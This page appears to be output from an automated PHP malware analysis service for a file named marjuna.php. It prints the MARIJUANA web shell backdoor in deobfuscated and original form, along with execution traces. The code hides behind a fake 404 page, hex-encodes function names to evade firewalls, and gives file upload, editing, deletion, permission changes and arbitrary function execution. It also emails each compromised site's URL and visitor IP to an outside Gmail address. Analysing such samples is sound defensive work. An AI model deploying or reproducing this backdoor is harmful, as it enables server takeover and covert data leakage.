PHP Malware Analysis
marjuna.php
md5: 25d16400b46b50271d52a10f5dc75052
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- galangganz76@gmail.com (Deobfuscated, Original)
Environment
- error_reporting (Deobfuscated, Original, Traces)
- set_time_limit (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _GET (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Title
- 404 Not Found (HTML)
- MARIJUANA (Deobfuscated, Original)
URLs
- http://localhost/165512160300 (Traces)
- https://site.com/marijuana.php?dampot=dampot (Deobfuscated, Original)
Deobfuscated PHP code
<?php
/*
* Shell MARIJUANA adalah backdoor yang dibangun dalam bahasa PHP dengan mode stealth yang dapat menerobos keamanan server. Setiap fungsi telah dikodekan menjadi hex untuk melewati WAF.
* BYPASS FORBIDDEN & Hidden
* Anti Tikung
* Cara memanggil Shell nya?
* https://site.com/marijuana.php?dampot=dampot
*/
error_reporting(0);
ini_set('max_execution_time', 0);
session_start();
$name = "dampot";
function login()
{
$random_url = mt_rand(1000000, 247345736453);
$curl = curl_init();
$protocol = 'http://';
if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] != 'off') {
$protocol = 'https://';
}
curl_setopt($curl, CURLOPT_URL, $protocol . $_SERVER['HTTP_HOST'] . '/' . $random_url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
$server_404 = curl_exec($curl);
$server_404 = str_replace("/{$random_url}", $_SERVER['SCRIPT_NAME'], $server_404);
$server_404 = str_replace("{$random_url}", $_SERVER['SCRIPT_NAME'], $server_404);
echo $server_404;
exit;
}
if (!isset($_SESSION[md5($sexy)])) {
if (isset($_GET[$name]) && $_GET[$name] == $name) {
$_SESSION[md5($sexy)] = true;
} else {
login();
}
}
header("X-XSS-Protection: 0");
ob_start();
set_time_limit(0);
error_reporting(0);
ini_set('display_errors', FALSE);
$Array = ['7068705f756e616d65', '70687076657273696f6e', '6368646972', '676574637764', '707265675f73706c6974', '636f7079', '66696c655f6765745f636f6e74656e7473', '6261736536345f6465636f6465', '69735f646972', '6f625f656e645f636c65616e28293b', '756e6c696e6b', '6d6b646972', '63686d6f64', '7363616e646972', '7374725f7265706c616365', '68746d6c7370656369616c6368617273', '7661725f64756d70', '666f70656e', '667772697465', '66636c6f7365', '64617465', '66696c656d74696d65', '737562737472', '737072696e7466', '66696c657065726d73', '746f756368', '66696c655f657869737473', '72656e616d65', '69735f6172726179', '69735f6f626a656374', '737472706f73', '69735f7772697461626c65', '69735f7265616461626c65', '737472746f74696d65', '66696c6573697a65', '726d646972', '6f625f6765745f636c65616e', '7265616466696c65', '617373657274'];
$___ = count($Array);
for ($i = 0; $i < $___; $i++) {
$GNJ[] = uhex($Array[$i]);
}
?>
<!DOCTYPE html>
<html dir="auto" lang="en-US">
<head>
<meta charset="UTF-8">
<meta name="robots" content="NOINDEX, NOFOLLOW">
<title>MARIJUANA</title>
<link rel="icon" href="//0x5a455553.github.io/MARIJUANA/icon.png" />
<link rel="stylesheet" href="//0x5a455553.github.io/MARIJUANA/main.css" type="text/css">
<script src="//ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/notify/0.4.2/notify.min.js"></script>
</head>
<body>
<header>
<div class="y x">
<a class="ajx" href="<?php
echo basename($_SERVER['PHP_SELF']);
?>">
MARIJuANA
</a>
</div>
<div class="q x w">
— DIOS — NO — CREA — NADA — EN — VANO —
</div>
</header>
<article>
<div class="i">
<i class="far fa-hdd"></i>
<?php
echo $GNJ[0]();
?>
<br />
<i class="far fa-lightbulb"></i>   <b>SOFT :</b> <?php
echo $_SERVER['SERVER_SOFTWARE'];
?><b>PHP :</b> <?php
echo $GNJ[1]();
?>
<br />
<i class="far fa-folder"></i>
<?php
if (isset($_GET["d"])) {
$d = uhex($_GET["d"]);
$GNJ[2](uhex($_GET["d"]));
} else {
$d = $GNJ[3]();
}
$k = $GNJ[4]("/(\\\\|\\/)/", $d);
foreach ($k as $m => $l) {
if ($l == '' && $m == 0) {
echo "<a class=\"ajx\" href=\"?d=2f\">/</a>";
}
if ($l == '') {
continue;
}
echo "<a class=\"ajx\" href=\"?d=";
for ($i = 0; $i <= $m; $i++) {
echo hex($k[$i]);
if ($i != $m) {
echo "2f";
}
}
echo '">' . $l . '</a>/';
}
?>
<br />
</div>
<div class="u">
<?php
echo $_SERVER['SERVER_ADDR'];
?><i class="fas fa-link"></i>
<br />
<br />
<form method="post" enctype="multipart/form-data">
<label class="l w">
<input type="file" name="n[]" onchange="this.form.submit()" multiple> UPLOAD
</label>
</form>
<?php
$o_ = ['<script>$.notify("', '", { className:"1",autoHideDelay: 2000,position:"left bottom" });</script>'];
$f = "<script>\$.notify(\"OK!\", { className:\"1\",autoHideDelay: 2000,position:\"left bottom\" });</script>";
$g = "<script>\$.notify(\"ER!\", { className:\"1\",autoHideDelay: 2000,position:\"left bottom\" });</script>";
if (isset($_FILES["n"])) {
$z = $_FILES["n"]["name"];
$r = count($z);
for ($i = 0; $i < $r; $i++) {
if ($GNJ[5]($_FILES["n"]["tmp_name"][$i], $z[$i])) {
echo $f;
} else {
echo $g;
}
}
}
?>
</div>
<?php
$a_ = '<table cellspacing="0" cellpadding="7" width="100%">
<thead>
<tr>
<th>';
$b_ = '</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
</tr>
<tr>
<td class="x">';
$c_ = '</td>
</tr>
</tbody>
</table>';
$d_ = '<br />
<br />
<input type="submit" class="w" value=" OK " />
</form>';
if (isset($_GET["s"])) {
echo $a_ . uhex($_GET["s"]) . $b_ . '
<textarea readonly="yes">' . $GNJ[15]($GNJ[6](uhex($_GET["s"]))) . '</textarea>
<br />
<br />
<input onclick="location.href=\'?d=' . $_GET["d"] . '&e=' . $_GET["s"] . '\'" type="submit" class="w" value=" EDIT " />
' . $c_;
} elseif (isset($_GET["y"])) {
echo "<table cellspacing=\"0\" cellpadding=\"7\" width=\"100%\">\r\n\t\t\t\t\t\t<thead>\r\n\t\t\t\t\t\t\t<tr>\r\n\t\t\t\t\t\t\t\t<th>REQUEST</th>\r\n\t\t\t\t\t\t\t</tr>\r\n\t\t\t\t\t\t</thead>\r\n\t\t\t\t\t\t<tbody>\r\n\t\t\t\t\t\t\t<tr>\r\n\t\t\t\t\t\t\t\t<td></td>\r\n\t\t\t\t\t\t\t</tr>\r\n\t\t\t\t\t\t\t<tr>\r\n\t\t\t\t\t\t\t\t<td class=\"x\">\r\n\t\t\t\t\t\t\t\t\t<form method=\"post\">\r\n\t\t\t\t\t\t\t\t\t\t<input class=\"x\" type=\"text\" name=\"1\" /> \r\n\t\t\t\t\t\t\t\t\t\t<input class=\"x\" type=\"text\" name=\"2\" />\r\n\t\t\t\t\t\t\t\t\t\t<br />\r\n\t\t\t\t\t\t\t\t\t\t<br />\r\n\t\t\t\t\t\t\t\t\t\t<input type=\"submit\" class=\"w\" value=\" OK \" />\r\n\t\t\t\t\t\t\t\t\t</form>\r\n\t\t\t\t\t\t\t\t\t<br />\r\n\t\t\t\t\t\t\t\t\t<textarea readonly=\"yes\">";
if (isset($_POST["2"])) {
echo $GNJ[15](dre($_POST["1"], $_POST["2"]));
}
echo '</textarea>
' . $c_;
} elseif (isset($_GET["e"])) {
echo $a_ . uhex($_GET["e"]) . $b_ . '
<form method="post">
<textarea name="e" class="o">' . $GNJ[15]($GNJ[6](uhex($_GET["e"]))) . '</textarea>
<br />
<br />
<span class="w">BASE64</span> :
<select id="b64" name="b64">
<option value="0">NO</option>
<option value="1">YES</option>
</select>
' . $d_ . '
' . $c_ . '
<script>
$("#b64").change(function() {
if($("#b64 option:selected").val() == 0) {
var X = $("textarea").val();
var Z = atob(X);
$("textarea").val(Z);
}
else {
var N = $("textarea").val();
var I = btoa(N);
$("textarea").val(I);
}
});
</script>';
if (isset($_POST["e"])) {
if ($_POST["b64"] == "1") {
$ex = $GNJ[7]($_POST["e"]);
} else {
$ex = $_POST["e"];
}
$fp = $GNJ[17](uhex($_GET["e"]), 'w');
if ($GNJ[18]($fp, $ex)) {
OK();
} else {
ER();
}
$GNJ[19]($fp);
}
} elseif (isset($_GET["x"])) {
rec(uhex($_GET["x"]));
if ($GNJ[26](uhex($_GET["x"]))) {
ER();
} else {
OK();
}
} elseif (isset($_GET["t"])) {
echo $a_ . uhex($_GET["t"]) . $b_ . '
<form action="" method="post">
<input name="t" class="x" type="text" value="' . $GNJ[20]("Y-m-d H:i", $GNJ[21](uhex($_GET["t"]))) . '">
' . $d_ . '
' . $c_;
if (!empty($_POST["t"])) {
$p = $GNJ[33]($_POST["t"]);
if ($p) {
if (!$GNJ[25](uhex($_GET["t"]), $p, $p)) {
ER();
} else {
OK();
}
} else {
ER();
}
}
} elseif (isset($_GET["k"])) {
echo $a_ . uhex($_GET["k"]) . $b_ . '
<form action="" method="post">
<input name="b" class="x" type="text" value="' . $GNJ[22]($GNJ[23]('%o', $GNJ[24](uhex($_GET["k"]))), -4) . '">
' . $d_ . '
' . $c_;
if (!empty($_POST["b"])) {
$x = $_POST["b"];
$t = 0;
for ($i = strlen($x) - 1; $i >= 0; --$i) {
$t += (int) $x[$i] * pow(8, strlen($x) - $i - 1);
}
if (!$GNJ[12](uhex($_GET["k"]), $t)) {
ER();
} else {
OK();
}
}
} elseif (isset($_GET["l"])) {
echo $a_ . '+DIR' . $b_ . '
<form action="" method="post">
<input name="l" class="x" type="text" value="">
' . $d_ . '
' . $c_;
if (isset($_POST["l"])) {
if (!$GNJ[11]($_POST["l"])) {
ER();
} else {
OK();
}
}
} elseif (isset($_GET["q"])) {
if ($GNJ[10]("/tmp/Deobfuscator8a1gkz")) {
$GNJ[38]($GNJ[9]);
header("Location: " . basename($_SERVER['PHP_SELF']) . "");
exit;
} else {
echo $g;
}
} elseif (isset($_GET["n"])) {
echo $a_ . '+FILE' . $b_ . '
<form action="" method="post">
<input name="n" class="x" type="text" value="">
' . $d_ . '
' . $c_;
if (isset($_POST["n"])) {
if (!$GNJ[25]($_POST["n"])) {
ER();
} else {
OK();
}
}
} elseif (isset($_GET["r"])) {
echo $a_ . uhex($_GET["r"]) . $b_ . '
<form action="" method="post">
<input name="r" class="x" type="text" value="' . uhex($_GET["r"]) . '">
' . $d_ . '
' . $c_;
if (isset($_POST["r"])) {
if ($GNJ[26]($_POST["r"])) {
ER();
} else {
if ($GNJ[27](uhex($_GET["r"]), $_POST["r"])) {
OK();
} else {
ER();
}
}
}
} elseif (isset($_GET["z"])) {
$zip = new ZipArchive();
$res = $zip->open(uhex($_GET["z"]));
if ($res === TRUE) {
$zip->extractTo(uhex($_GET["d"]));
$zip->close();
OK();
} else {
ER();
}
} else {
echo '<table cellspacing="0" cellpadding="7" width="100%">
<thead>
<tr>
<th width="44%">[ NAME ]</th>
<th width="11%">[ SIZE ]</th>
<th width="17%">[ PERM ]</th>
<th width="17%">[ DATE ]</th>
<th width="11%">[ ACT ]</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<a class="ajx" href="?d=' . hex($d) . '&n">+FILE</a>
<a class="ajx" href="?d=' . hex($d) . '&l">+DIR</a>
</td>
</tr>
';
$h = "";
$j = "";
$w = $GNJ[13]($d);
if ($GNJ[28]($w) || $GNJ[29]($w)) {
foreach ($w as $c) {
$e = $GNJ[14]("\\", "/", $d);
if (!$GNJ[30]($c, ".zip")) {
$zi = '';
} else {
$zi = '<a href="?d=' . hex($e) . '&z=' . hex($c) . '">U</a>';
}
if ($GNJ[31]("{$d}/{$c}")) {
$o = "";
} elseif (!$GNJ[32]("{$d}/{$c}")) {
$o = " h";
} else {
$o = " w";
}
$s = $GNJ[34]("{$d}/{$c}") / 1024;
$s = round($s, 3);
if ($s >= 1024) {
$s = round($s / 1024, 2) . " MB";
} else {
$s .= " KB";
}
if ($c != "." && $c != "..") {
$GNJ[8]("{$d}/{$c}") ? $h .= '<tr class="r">
<td>
<i class="far fa-folder m"></i>
<a class="ajx" href="?d=' . hex($e) . hex("/" . $c) . '">' . $c . '</a>
</td>
<td class="x">
dir
</td>
<td class="x">
<a class="ajx' . $o . '" href="?d=' . hex($e) . '&k=' . hex($c) . '">' . x("{$d}/{$c}") . '</a>
</td>
<td class="x">
<a class="ajx" href="?d=' . hex($e) . '&t=' . hex($c) . '">' . $GNJ[20]("Y-m-d H:i", $GNJ[21]("{$d}/{$c}")) . '</a>
</td>
<td class="x">
<a class="ajx" href="?d=' . hex($e) . '&r=' . hex($c) . '">R</a>
<a href="?d=' . hex($e) . '&x=' . hex($c) . '">D</a>
</td>
</tr>
' : ($j .= '<tr class="r">
<td>
<i class="far fa-file m"></i> 
<a class="ajx" href="?d=' . hex($e) . '&s=' . hex($c) . '">' . $c . '</a>
</td>
<td class="x">
' . $s . '
</td>
<td class="x">
<a class="ajx' . $o . '" href="?d=' . hex($e) . '&k=' . hex($c) . '">' . x("{$d}/{$c}") . '</a>
</td>
<td class="x">
<a class="ajx" href="?d=' . hex($e) . '&t=' . hex($c) . '">' . $GNJ[20]("Y-m-d H:i", $GNJ[21]("{$d}/{$c}")) . '</a>
</td>
<td class="x">
<a class="ajx" href="?d=' . hex($e) . '&r=' . hex($c) . '">R</a>
<a class="ajx" href="?d=' . hex($e) . '&e=' . hex($c) . '">E</a>
<a href="?d=' . hex($e) . '&g=' . hex($c) . '">G</a>
' . $zi . '
<a href="?d=' . hex($e) . '&x=' . hex($c) . '">D</a>
</td>
</tr>
');
}
}
}
echo $h;
echo $j;
echo '</tbody>
<tfoot>
<tr>
<th class="et">
<a class="ajx" href="?d=' . hex($e) . '&y">REQUEST</a>
<a href="?d=' . hex($e) . '&q">EXIT</a>
</th>
<th class="et" width="11%"></th>
<th class="et" width="17%"></th>
<th class="et" width="17%"></th>
<th class="et" width="11%"></th>
</tr>
</tfoot>
</table>';
}
?>
</article>
<footer class="x">
©TheAlmightyZeus
</footer>
<?php
if (isset($_GET["1"])) {
echo $f;
} elseif (isset($_GET["0"])) {
echo $g;
} else {
NULL;
}
?>
<script>
$(".ajx").click(function(t){t.preventDefault();var e=$(this).attr("href");history.pushState("","",e),$.get(e,function(t){$("body").html(t)})});
</script>
</body>
</html>
<?php
function rec($j)
{
global $GNJ;
if (trim(pathinfo($j, PATHINFO_BASENAME), '.') === '') {
return;
}
if ($GNJ[8]($j)) {
array_map('rec', glob($j . DIRECTORY_SEPARATOR . '{,.}*', "GLOB_N_SOWT"));
$GNJ[35]($j);
} else {
$GNJ[10]($j);
}
}
function dre($y1, $y2)
{
global $GNJ;
ob_start();
$GNJ[16]($y1($y2));
return $GNJ[36]();
}
function hex($n)
{
$y = '';
for ($i = 0; $i < strlen($n); $i++) {
$y .= dechex(ord($n[$i]));
}
return $y;
}
function uhex($y)
{
$n = '';
for ($i = 0; $i < strlen($y) - 1; $i += 2) {
$n .= chr(hexdec($y[$i] . $y[$i + 1]));
}
return $n;
}
function OK()
{
global $GNJ, $d;
$GNJ[38]($GNJ[9]);
header("Location: ?d=" . hex($d) . "&1");
exit;
}
function ER()
{
global $GNJ, $d;
$GNJ[38]($GNJ[9]);
header("Location: ?d=" . hex($d) . "&0");
exit;
}
function x($c)
{
global $GNJ;
$x = $GNJ[24]($c);
if (($x & 0xc000) == 0xc000) {
$u = "s";
} elseif (($x & 0xa000) == 0xa000) {
$u = "l";
} elseif (($x & 0x8000) == 0x8000) {
$u = "-";
} elseif (($x & 0x6000) == 0x6000) {
$u = "b";
} elseif (($x & 0x4000) == 0x4000) {
$u = "d";
} elseif (($x & 0x2000) == 0x2000) {
$u = "c";
} elseif (($x & 0x1000) == 0x1000) {
$u = "p";
} else {
$u = "u";
}
$u .= $x & 0x100 ? "r" : "-";
$u .= $x & 0x80 ? "w" : "-";
$u .= $x & 0x40 ? $x & 0x800 ? "s" : "x" : ($x & 0x800 ? "S" : "-");
$u .= $x & 0x20 ? "r" : "-";
$u .= $x & 0x10 ? "w" : "-";
$u .= $x & 0x8 ? $x & 0x400 ? "s" : "x" : ($x & 0x400 ? "S" : "-");
$u .= $x & 0x4 ? "r" : "-";
$u .= $x & 0x2 ? "w" : "-";
$u .= $x & 0x1 ? $x & 0x200 ? "t" : "x" : ($x & 0x200 ? "T" : "-");
return $u;
}
if (isset($_GET["g"])) {
$GNJ[38]($GNJ[9]);
header("Content-Type: application/octet-stream");
header("Content-Transfer-Encoding: Binary");
header("Content-Length: " . $GNJ[34](uhex($_GET["g"])));
header("Content-disposition: attachment; filename=\"" . uhex($_GET["g"]) . "\"");
$GNJ[37](uhex($_GET["g"]));
}
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
$tujuanmail = 'galangganz76@gmail.com';
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$pesan_alert = "fix {$x_path} :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");Execution traces
data/traces/25d16400b46b50271d52a10f5dc75052_trace-1676258729.271.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:25:55.168795]
1 0 1 0.000147 393528
1 3 0 0.000762 512992 {main} 1 /var/www/html/uploads/marjuna.php 0 0
2 4 0 0.000780 512992 error_reporting 0 /var/www/html/uploads/marjuna.php 10 1 0
2 4 1 0.000796 513032
2 4 R 22527
2 5 0 0.000810 512992 ini_set 0 /var/www/html/uploads/marjuna.php 11 2 'max_execution_time' 0
2 5 1 0.000827 513096
2 5 R '30'
2 6 0 0.000840 512992 session_start 0 /var/www/html/uploads/marjuna.php 12 0
2 6 1 0.000895 513744
2 6 R TRUE
1 A /var/www/html/uploads/marjuna.php 13 $name = 'dampot'
2 7 0 0.000925 513744 md5 0 /var/www/html/uploads/marjuna.php 30 1 NULL
2 7 1 0.000939 513840
2 7 R 'd41d8cd98f00b204e9800998ecf8427e'
2 8 0 0.000955 513744 login 1 /var/www/html/uploads/marjuna.php 34 0
3 9 0 0.000968 513744 mt_rand 0 /var/www/html/uploads/marjuna.php 16 2 1000000 247345736453
3 9 1 0.000985 513808
3 9 R 165512160300
2 A /var/www/html/uploads/marjuna.php 16 $random_url = 165512160300
3 10 0 0.001009 513744 curl_init 0 /var/www/html/uploads/marjuna.php 17 0
3 10 1 0.001028 514656
3 10 R resource(3) of type (curl)
2 A /var/www/html/uploads/marjuna.php 17 $curl = resource(3) of type (curl)
2 A /var/www/html/uploads/marjuna.php 18 $protocol = 'http://'
3 11 0 0.001068 514712 curl_setopt 0 /var/www/html/uploads/marjuna.php 22 3 resource(3) of type (curl) 10002 'http://localhost/165512160300'
3 11 1 0.001085 514808
3 11 R TRUE
3 12 0 0.001097 514656 curl_setopt 0 /var/www/html/uploads/marjuna.php 23 3 resource(3) of type (curl) 19913 TRUE
3 12 1 0.001113 514752
3 12 R TRUE
3 13 0 0.001126 514656 curl_exec 0 /var/www/html/uploads/marjuna.php 24 1 resource(3) of type (curl)
3 13 1 0.001412 518784
3 13 R '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.52 (Ubuntu) Server at localhost Port 80</address>\n</body></html>\n'
2 A /var/www/html/uploads/marjuna.php 24 $server_404 = '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.52 (Ubuntu) Server at localhost Port 80</address>\n</body></html>\n'
3 14 0 0.001473 518792 str_replace 0 /var/www/html/uploads/marjuna.php 25 3 '/165512160300' '/uploads/marjuna.php' '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.52 (Ubuntu) Server at localhost Port 80</address>\n</body></html>\n'
3 14 1 0.001500 518888
3 14 R '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.52 (Ubuntu) Server at localhost Port 80</address>\n</body></html>\n'
2 A /var/www/html/uploads/marjuna.php 25 $server_404 = '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.52 (Ubuntu) Server at localhost Port 80</address>\n</body></html>\n'
3 15 0 0.001548 518792 str_replace 0 /var/www/html/uploads/marjuna.php 26 3 '165512160300' '/uploads/marjuna.php' '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.52 (Ubuntu) Server at localhost Port 80</address>\n</body></html>\n'
3 15 1 0.001572 518888
3 15 R '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.52 (Ubuntu) Server at localhost Port 80</address>\n</body></html>\n'
2 A /var/www/html/uploads/marjuna.php 26 $server_404 = '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.52 (Ubuntu) Server at localhost Port 80</address>\n</body></html>\n'
0.001679 438528
TRACE END [2023-02-13 01:25:55.170359]
Generated HTML code
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.52 (Ubuntu) Server at localhost Port 80</address>
</body></html>Original PHP code
<?php
/*
* Shell MARIJUANA adalah backdoor yang dibangun dalam bahasa PHP dengan mode stealth yang dapat menerobos keamanan server. Setiap fungsi telah dikodekan menjadi hex untuk melewati WAF.
* BYPASS FORBIDDEN & Hidden
* Anti Tikung
* Cara memanggil Shell nya?
* https://site.com/marijuana.php?dampot=dampot
*/
error_reporting(0);
ini_set('max_execution_time', 0);
session_start();
$name = "dampot";
function login()
{
$random_url = mt_rand(1000000, 247345736453);
$curl = curl_init();
$protocol = 'http://';
if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] != 'off') {
$protocol = 'https://';
}
curl_setopt($curl, CURLOPT_URL, $protocol . $_SERVER['HTTP_HOST'] . '/' . $random_url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
$server_404 = curl_exec($curl);
$server_404 = str_replace("/{$random_url}", $_SERVER['SCRIPT_NAME'], $server_404);
$server_404 = str_replace("{$random_url}", $_SERVER['SCRIPT_NAME'], $server_404);
echo $server_404;
exit;
}
if (!isset($_SESSION[md5($sexy)])) {
if (isset($_GET[$name]) && $_GET[$name] == $name) {
$_SESSION[md5($sexy)] = true;
} else {
login();
}
}
header("X-XSS-Protection: 0");
ob_start();
set_time_limit(0);
error_reporting(0);
ini_set('display_errors', FALSE);
$Array = ['7068705f756e616d65', '70687076657273696f6e', '6368646972', '676574637764', '707265675f73706c6974', '636f7079', '66696c655f6765745f636f6e74656e7473', '6261736536345f6465636f6465', '69735f646972', '6f625f656e645f636c65616e28293b', '756e6c696e6b', '6d6b646972', '63686d6f64', '7363616e646972', '7374725f7265706c616365', '68746d6c7370656369616c6368617273', '7661725f64756d70', '666f70656e', '667772697465', '66636c6f7365', '64617465', '66696c656d74696d65', '737562737472', '737072696e7466', '66696c657065726d73', '746f756368', '66696c655f657869737473', '72656e616d65', '69735f6172726179', '69735f6f626a656374', '737472706f73', '69735f7772697461626c65', '69735f7265616461626c65', '737472746f74696d65', '66696c6573697a65', '726d646972', '6f625f6765745f636c65616e', '7265616466696c65', '617373657274'];
$___ = count($Array);
for ($i = 0; $i < $___; $i++) {
$GNJ[] = uhex($Array[$i]);
}
?>
<!DOCTYPE html>
<html dir="auto" lang="en-US">
<head>
<meta charset="UTF-8">
<meta name="robots" content="NOINDEX, NOFOLLOW">
<title>MARIJUANA</title>
<link rel="icon" href="//0x5a455553.github.io/MARIJUANA/icon.png" />
<link rel="stylesheet" href="//0x5a455553.github.io/MARIJUANA/main.css" type="text/css">
<script src="//ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/notify/0.4.2/notify.min.js"></script>
</head>
<body>
<header>
<div class="y x">
<a class="ajx" href="<?php
echo basename($_SERVER['PHP_SELF']);
?>">
MARIJuANA
</a>
</div>
<div class="q x w">
— DIOS — NO — CREA — NADA — EN — VANO —
</div>
</header>
<article>
<div class="i">
<i class="far fa-hdd"></i>
<?php
echo $GNJ[0]();
?>
<br />
<i class="far fa-lightbulb"></i>   <b>SOFT :</b> <?php
echo $_SERVER['SERVER_SOFTWARE'];
?><b>PHP :</b> <?php
echo $GNJ[1]();
?>
<br />
<i class="far fa-folder"></i>
<?php
if (isset($_GET["d"])) {
$d = uhex($_GET["d"]);
$GNJ[2](uhex($_GET["d"]));
} else {
$d = $GNJ[3]();
}
$k = $GNJ[4]("/(\\\\|\\/)/", $d);
foreach ($k as $m => $l) {
if ($l == '' && $m == 0) {
echo "<a class=\"ajx\" href=\"?d=2f\">/</a>";
}
if ($l == '') {
continue;
}
echo "<a class=\"ajx\" href=\"?d=";
for ($i = 0; $i <= $m; $i++) {
echo hex($k[$i]);
if ($i != $m) {
echo "2f";
}
}
echo '">' . $l . '</a>/';
}
?>
<br />
</div>
<div class="u">
<?php
echo $_SERVER['SERVER_ADDR'];
?><i class="fas fa-link"></i>
<br />
<br />
<form method="post" enctype="multipart/form-data">
<label class="l w">
<input type="file" name="n[]" onchange="this.form.submit()" multiple> UPLOAD
</label>
</form>
<?php
$o_ = ['<script>$.notify("', '", { className:"1",autoHideDelay: 2000,position:"left bottom" });</script>'];
$f = "<script>\$.notify(\"OK!\", { className:\"1\",autoHideDelay: 2000,position:\"left bottom\" });</script>";
$g = "<script>\$.notify(\"ER!\", { className:\"1\",autoHideDelay: 2000,position:\"left bottom\" });</script>";
if (isset($_FILES["n"])) {
$z = $_FILES["n"]["name"];
$r = count($z);
for ($i = 0; $i < $r; $i++) {
if ($GNJ[5]($_FILES["n"]["tmp_name"][$i], $z[$i])) {
echo $f;
} else {
echo $g;
}
}
}
?>
</div>
<?php
$a_ = '<table cellspacing="0" cellpadding="7" width="100%">
<thead>
<tr>
<th>';
$b_ = '</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
</tr>
<tr>
<td class="x">';
$c_ = '</td>
</tr>
</tbody>
</table>';
$d_ = '<br />
<br />
<input type="submit" class="w" value=" OK " />
</form>';
if (isset($_GET["s"])) {
echo $a_ . uhex($_GET["s"]) . $b_ . '
<textarea readonly="yes">' . $GNJ[15]($GNJ[6](uhex($_GET["s"]))) . '</textarea>
<br />
<br />
<input onclick="location.href=\'?d=' . $_GET["d"] . '&e=' . $_GET["s"] . '\'" type="submit" class="w" value=" EDIT " />
' . $c_;
} elseif (isset($_GET["y"])) {
echo "<table cellspacing=\"0\" cellpadding=\"7\" width=\"100%\">\r\n\t\t\t\t\t\t<thead>\r\n\t\t\t\t\t\t\t<tr>\r\n\t\t\t\t\t\t\t\t<th>REQUEST</th>\r\n\t\t\t\t\t\t\t</tr>\r\n\t\t\t\t\t\t</thead>\r\n\t\t\t\t\t\t<tbody>\r\n\t\t\t\t\t\t\t<tr>\r\n\t\t\t\t\t\t\t\t<td></td>\r\n\t\t\t\t\t\t\t</tr>\r\n\t\t\t\t\t\t\t<tr>\r\n\t\t\t\t\t\t\t\t<td class=\"x\">\r\n\t\t\t\t\t\t\t\t\t<form method=\"post\">\r\n\t\t\t\t\t\t\t\t\t\t<input class=\"x\" type=\"text\" name=\"1\" /> \r\n\t\t\t\t\t\t\t\t\t\t<input class=\"x\" type=\"text\" name=\"2\" />\r\n\t\t\t\t\t\t\t\t\t\t<br />\r\n\t\t\t\t\t\t\t\t\t\t<br />\r\n\t\t\t\t\t\t\t\t\t\t<input type=\"submit\" class=\"w\" value=\" OK \" />\r\n\t\t\t\t\t\t\t\t\t</form>\r\n\t\t\t\t\t\t\t\t\t<br />\r\n\t\t\t\t\t\t\t\t\t<textarea readonly=\"yes\">";
if (isset($_POST["2"])) {
echo $GNJ[15](dre($_POST["1"], $_POST["2"]));
}
echo '</textarea>
' . $c_;
} elseif (isset($_GET["e"])) {
echo $a_ . uhex($_GET["e"]) . $b_ . '
<form method="post">
<textarea name="e" class="o">' . $GNJ[15]($GNJ[6](uhex($_GET["e"]))) . '</textarea>
<br />
<br />
<span class="w">BASE64</span> :
<select id="b64" name="b64">
<option value="0">NO</option>
<option value="1">YES</option>
</select>
' . $d_ . '
' . $c_ . '
<script>
$("#b64").change(function() {
if($("#b64 option:selected").val() == 0) {
var X = $("textarea").val();
var Z = atob(X);
$("textarea").val(Z);
}
else {
var N = $("textarea").val();
var I = btoa(N);
$("textarea").val(I);
}
});
</script>';
if (isset($_POST["e"])) {
